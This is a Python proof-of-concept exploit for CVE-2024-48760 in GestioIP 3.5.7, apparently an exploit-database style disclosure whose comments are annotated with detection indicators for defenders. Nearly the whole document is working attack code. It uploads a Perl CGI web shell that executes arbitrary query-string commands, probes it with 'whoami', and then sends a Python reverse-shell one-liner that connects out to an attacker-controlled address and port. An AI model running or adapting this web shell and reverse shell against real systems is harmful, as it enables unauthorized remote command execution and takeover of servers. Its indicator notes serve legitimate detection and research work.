# Exploit Title: GestioIP 3.5.7 - Remote Command Execution (RCE)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email (max.cybersecurity at belino.com)
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-48760
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-48760
import requests
import sys
# Config
# Inputs of the PoC. The issue is post-authentication: the upload below is
# sent with these credentials (requests tuple auth, see main), so valid
# GestioIP credentials are a precondition.
username = "gipadmin"
password = "PASSWORD"  # placeholder; must be replaced with a real value
domain = "localhost"  # host running GestioIP v3.5.7 (per the header)
local_ip = "10.20.0.1"  # address the uploaded CGI connects back to (used in main)
local_port = 443  # port for that connection
# The same path is used for the upload and for every later request: the PoC
# names the uploaded file 'upload.cgi' (see main), so presumably the API
# script at this path is replaced -- confirm against the disclosure. A change
# to this file is a strong integrity-monitoring indicator.
target_url = f"http://{domain}/gestioip/api/upload.cgi"
# CGI Backdoor Perl
# Perl CGI that the PoC uploads under the name 'upload.cgi' (see main). It
# only un-escapes the handful of percent sequences listed below, then runs
# the raw QUERY_STRING in backticks and echoes each output line inside <pre>.
# Two fixed strings in it -- the HTML comment '<!-- CGI backdoor -->' and the
# 'Usage:' line -- are cheap artifacts to search for on disk and in
# responses when hunting for this shell.
backdoor_code = """#!/usr/bin/perl -w
use strict;
print "Cache-Control: no-cache\\n";
print "Content-type: text/html\\n\\n";
my $req = $ENV{QUERY_STRING};
chomp ($req);
$req =~ s/%20/ /g;
$req =~ s/%3b/;/g;
$req =~ s/%7c/|/gi;
$req =~ s/%27/'/g;
$req =~ s/%22/"/g;
$req =~ s/%5D/]/g;
$req =~ s/%5B/[/g;
print "<html><body>";
print '<!-- CGI backdoor -->';
if (!$req) {
print "Usage: http://domain/gestioip/api/upload.cgi?whoami";
} else {
print "Executing: $req";
}
print "<pre>";
my @cmd = `$req`;
print "</pre>";
foreach my $line (@cmd) {
print $line . "<br/>";
}
print "</body></html>";
"""
# Exploit functions
def upload_file(session, file_name, file_data):
    """Send *file_data* to ``target_url`` as a multipart POST.

    Two multipart fields are sent: ``file_name`` as a bare form value and
    ``leases_file`` as the file part (filename *file_name*). A response body
    containing ``OK`` is treated as success; anything else is reported and
    the process exits with status 1.

    Defender note: the request shape to match on is an authenticated
    multipart POST to the upload endpoint whose ``file_name`` field carries
    a ``.cgi`` name (the PoC uses 'upload.cgi').

    Args:
        session: ``requests.Session`` already carrying the credentials.
        file_name: value of the ``file_name`` field and the part filename.
        file_data: contents of the uploaded file.

    Returns:
        The ``requests.Response`` of the POST when the server answered OK.
    """
    multipart = {
        'file_name': (None, file_name),
        'leases_file': (file_name, file_data),
    }
    reply = session.post(target_url, files=multipart)
    if "OK" in reply.text:
        return reply
    print(f"[!] Error uploading {file_name}.")
    sys.exit(1)
def run_command(session, cmd):
    """GET ``target_url`` with *cmd* as the raw query string and print the body.

    *cmd* is not URL-encoded here; the uploaded CGI (``backdoor_code``)
    un-escapes only a fixed set of percent sequences before running it.

    Defender note: a query string on this endpoint that contains shell
    syntax is the post-upload artifact to look for in access logs.

    Args:
        session: ``requests.Session`` already carrying the credentials.
        cmd: text appended after ``?``.
    """
    print(session.get(f"{target_url}?{cmd}").text)
def backdoor_exists(session):
    """Return True when ``target_url`` already answers like the uploaded CGI.

    Probes ``target_url?whoami`` and treats a body containing ``www-data``
    as the uploaded shell being in place; the check therefore assumes the
    web server runs as that account.

    Defender note: a ``?whoami`` query against the upload endpoint is itself
    an indicator worth alerting on.

    Args:
        session: ``requests.Session`` already carrying the credentials.
    """
    probe = session.get(f"{target_url}?whoami")
    return "www-data" in probe.text
if __name__ == '__main__':
    # Full sequence of the PoC, every request going to target_url with the
    # configured credentials (requests tuple auth). Each step leaves a
    # distinct log line: a GET with '?whoami', an authenticated multipart
    # POST naming 'upload.cgi', then a GET whose query string is the
    # python3 one-liner built below.
    with requests.Session() as session:
        session.auth = (username, password)
        # Verify if backdoor is already uploaded
        if not backdoor_exists(session):
            print("\n[!] Uploading backdoor...\n")
            upload_file(session, 'upload.cgi', backdoor_code)
        else:
            print("\n[+] Backdoor already uploaded. Continue...\n")
        # Execute the reverse shell
        # The command is placed un-encoded in the query string; the uploaded
        # CGI (backdoor_code) runs it and the resulting shell connects out to
        # local_ip:local_port. An outbound connection from the web server to
        # an arbitrary host on 443 right after the requests above is the
        # network-side indicator.
        print("\n[!] Executing reverse shell...\n")
        reverse_shell_cmd = f'python3 -c "import socket, subprocess, os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((\'{local_ip}\', {local_port})); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); p=subprocess.call([\'/bin/sh\', \'-i\']);"'
        run_command(session, reverse_shell_cmd)